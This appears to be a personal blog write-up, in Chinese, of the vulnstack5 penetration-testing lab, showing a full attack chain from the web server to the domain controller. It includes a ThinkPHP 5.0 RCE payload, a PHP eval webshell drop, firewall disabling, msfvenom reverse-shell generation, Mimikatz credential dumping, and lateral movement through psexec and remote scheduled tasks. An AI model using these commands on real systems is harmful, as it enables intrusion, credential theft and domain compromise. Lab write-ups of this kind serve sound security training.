vulnstack5记录

发布于 2022-01-16  9 次阅读


环境描述

kali 192.168.135.128/24

win7 192.168.135.129/24 192.168.138.136

win8 192.168.138.138

外网

thinkphp5.0

找了几个tp的漏洞工具扫一下,就可以得到了

phpinfo checked success! poc1: /index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

一个rce漏洞

稍微改一下payload,s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

就可以得知这个入口admin可以利用了。

s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^%3C?php%20@eval($_POST[%27matoujin%27]);%20?^%3E%20%3E%20shell.php

跑了一下,发现GET方法的木马是不可以的,蚁剑会无返回数据,具体原因可能因为在源码分析中invokeargs函数以数组方式传递,而POST参数以数组方式传递,才能继续命令执行?

内网

msf马

先通过蚁剑把防火墙关了

netsh firewall set opmode disable

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.135.128 LPORT=4444 -b"\\x00" -e x86/shikata_ga_nai -f exe > msf.exe

msf上payloadwindows/meterpreter/reverse_tcp

然后直接getsystem,手动进程迁移

kiwi

creds_kerberos

管理员密码就出来了。

那么这台主机也就相当于拿下了。

横向

ipconfig

IPv4 Address : 192.168.138.136 IPv4 Netmask : 255.255.255.0

找一下域控

systeminfo

域: sun.com 登录服务器: \\DC

nslookup -type=SRV _ldap._tcp

dc.sun.com internet address = 192.168.138.138

配置路由转发

msf>route add 192.168.138.0 255.255.255.0 6

nmap扫一下域控ip T4

Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008

445端口

进meteroreter改一下编码chcp 65001

利用之前的明文密码进行ipc空连接

net use \\\\192.168.138.138\\ipc$ “dc1234.com” /user:administrator

结果是disconnected,那就算了,还是找一下win2008 server的洞

(这里后来我打开win2008dc机,发现ipc是关闭的,后来我把它打开再net use就是正常的了)

根据提示利用psexec进行远程控制

use exploit/windows/smb/psexec

set rhosts 192.168.138.138

报错,无法建立

sc \\\\192.168.138.138 create unablefirewal binpath= "netsh advfirewall set allprofiles state off"

sc \\\\192.168.138.138 start unablefirewalll

报错,服务没有及时响应启动或控制请求

进攻DC:test payload1

  1. ip为攻击机

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.135.128 LPORT=5555 -b"\\x00" -e x86/shikata_ga_nai -f exe > 1.exe

  1. 内网机上传并执行木马

建立连接

net use \\\\192.168.138.138\\ipc$ “dc1234.com” /user:administrator

上传木马

copy C:\\Users\\Administrator\\Desktop\\1.exe \\\\192.168.138.138\\c$

打开win2008检查一下

确实是上传了

Psexec64执行报错

Psexec64.exe \\\\192.168.138.138 -u administrator -p dc1234.com C:\\1.exe

报错:登录失败,未授予用户在此计算机上的请求登录类型。

解决方案:

Psexec64.exe \\\\192.168.138.138 -accepteula -u administrator -p dc1234.com -i C:\\1.exe

但是会卡在执行处。

用计划任务试一下

net time \\\\192.168.138.138 查询时间

Psexec64.exe \\\\192.168.138.138 -h -u administrator -p dc1234.com -i schtasks /create /TN cs1 /TR C:\\1.exe /SC once /ST 21:18

计划查询失败,到时间进程未执行,schtasks报错退出。检查发现,计划任务cs并未创建。

PsExec64.exe \\\\192.168.138.138 -u administrator -p dc1234.com cmd /c "ipconfig" 执行成功

at \\\\192.168.138.138 21:45:00 C:\\1.exe 执行成功

test1证明

  1. at进行远程计划任务可行
  2. copy上传文件可行

实际操作只要跑一下msf就好

Psexec64.exe \\\\192.168.138.138 -accepteula -u administrator -p dc1234.com -i cmd.exe 也行


间桐桜のお菓子屋さん